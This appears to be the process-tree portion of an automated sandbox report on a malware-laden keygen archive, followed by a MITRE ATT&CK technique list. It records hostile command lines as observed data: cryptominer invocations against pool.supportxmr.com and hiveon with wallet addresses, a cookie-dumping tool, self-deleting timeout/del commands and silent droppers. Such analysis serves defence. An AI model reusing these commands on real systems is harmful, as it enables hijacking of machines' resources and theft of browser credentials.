C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
5⤵
PID:5380

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
6⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
PID:5584

C:\Users\Admin\AppData\Roaming\859.tmp.exe
"C:\Users\Admin\AppData\Roaming\859.tmp.exe"
5⤵
PID:5692

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w7608 --cpu-max-threads-hint 50 -r 9999
6⤵
PID:5404

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w18703@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:1344

C:\Users\Admin\AppData\Roaming\A1F.tmp.exe
"C:\Users\Admin\AppData\Roaming\A1F.tmp.exe"
5⤵
PID:6080

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A1F.tmp.exe
6⤵
PID:4132

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:4000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:6872

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6260

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
PID:4884

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
PID:8104

C:\ProgramData\1417674.exe
"C:\ProgramData\1417674.exe"
5⤵
PID:748

C:\ProgramData\8343363.exe
"C:\ProgramData\8343363.exe"
5⤵
PID:5880

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
PID:6528

C:\ProgramData\7970337.exe
"C:\ProgramData\7970337.exe"
5⤵
PID:7400

C:\ProgramData\7970337.exe
"{path}"
6⤵
PID:7324

C:\ProgramData\7970337.exe
"{path}"
6⤵
PID:6312

C:\ProgramData\7970337.exe
"{path}"
6⤵
PID:4564

C:\ProgramData\4243102.exe
"C:\ProgramData\4243102.exe"
5⤵
PID:7980

C:\ProgramData\4243102.exe
"{path}"
6⤵
PID:7768

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:2512

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Lz0.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:852

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5888

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2128

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F308DC79A06AA9518B4CE030D43DAA67 C
2⤵
PID:5244

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EB6C50044EBE7FF8FC165F8AB0B11B88
2⤵
PID:5768

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:5696

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:4168

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
4⤵
PID:7672

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1e0,0x1f0,0x7ffa30d69ec0,0x7ffa30d69ed0,0x7ffa30d69ee0
5⤵
PID:8520

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
5⤵
PID:9664

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1844 /prefetch:8
5⤵
PID:9904

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=2208 /prefetch:8
5⤵
PID:7436

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2520 /prefetch:1
5⤵
PID:9548

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2856 /prefetch:2
5⤵
PID:10064

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1648 /prefetch:8
5⤵
PID:9288

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=3608 /prefetch:8
5⤵
PID:9828

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3516 /prefetch:2
5⤵
PID:4192

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=3416 /prefetch:8
5⤵
PID:2224

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=2132 /prefetch:8
5⤵
PID:8596

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1496 /prefetch:8
5⤵
PID:8212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEA919.bat" "
3⤵
PID:8216

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
4⤵
- Views/modifies file attributes
PID:6656

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:6448

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEA919.bat"
4⤵
- Views/modifies file attributes
PID:7976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEA919.bat" "
4⤵
PID:9516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:9624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat" "
3⤵
PID:8804

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
4⤵
- Views/modifies file attributes
PID:8752

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:8576

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:9748

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat"
4⤵
- Views/modifies file attributes
PID:9960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat" "
4⤵
PID:7044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:7500

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3728

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6800

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7724

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7db5df75-8bbf-6b47-95a4-137c382bd900}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:4508

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
2⤵
PID:7436

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\942c89ce0a394683b03a2eac52376814 /t 5556 /p 3728
1⤵
PID:7640

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7464

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7348

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:6472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2916

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7308

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\87EA.exe
C:\Users\Admin\AppData\Local\Temp\87EA.exe
1⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\8DC7.exe
C:\Users\Admin\AppData\Local\Temp\8DC7.exe
1⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\B18C.exe
C:\Users\Admin\AppData\Local\Temp\B18C.exe
1⤵
PID:6488

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B18C.exe"
2⤵
PID:6052

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:6068

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f7d0ebbeee8a423f99386fd341db5eea /t 6040 /p 8136
1⤵
PID:6008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7448

C:\Users\Admin\AppData\Local\Temp\CBEB.exe
C:\Users\Admin\AppData\Local\Temp\CBEB.exe
1⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\F445.exe
C:\Users\Admin\AppData\Local\Temp\F445.exe
1⤵
PID:4248

C:\Users\Admin\AppData\Local\Temp\1302260226.exe
"C:\Users\Admin\AppData\Local\Temp\1302260226.exe"
2⤵
PID:6388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
3⤵
PID:8976

C:\Users\Admin\AppData\Local\Temp\764823507.exe
"C:\Users\Admin\AppData\Local\Temp\764823507.exe"
2⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\764823507.exe
"C:\Users\Admin\AppData\Local\Temp\764823507.exe"
3⤵
PID:9496

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f976bb7e083e4a7aba5c679e0685ec15 /t 6560 /p 7448
1⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\1A7B.exe
C:\Users\Admin\AppData\Local\Temp\1A7B.exe
1⤵
PID:8264

C:\Users\Admin\AppData\Local\Temp\1A7B.exe
"{path}"
2⤵
PID:8540

C:\Users\Admin\AppData\Local\Temp\22F8.exe
C:\Users\Admin\AppData\Local\Temp\22F8.exe
1⤵
PID:8600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8864

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9068

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8372

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8276

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8060

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4924

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5360

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8252

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dea49e93ca4945a19aa23befb46ec5d5 /t 8336 /p 8252
1⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\is-DRL2O.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRL2O.tmp\vict.tmp" /SL5="$B0526,870426,780800,C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe" /VERYSILENT /id=535
1⤵
PID:9628

C:\Users\Admin\AppData\Local\Temp\is-UTVFR.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-UTVFR.tmp\win1host.exe" 535
2⤵
PID:8964

C:\Users\Admin\AppData\Local\Temp\is-S66JA.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S66JA.tmp\Setup3310.tmp" /SL5="$20774,138429,56832,C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:9936

C:\Users\Admin\AppData\Local\Temp\is-QECJC.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QECJC.tmp\Setup.exe" /Verysilent
2⤵
PID:9952

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f5b037cc72004a5390149ff211be5763 /t 504 /p 2916
1⤵
PID:10608

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4740 -s 1096
1⤵
- Program crash
PID:9808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

System Information Discovery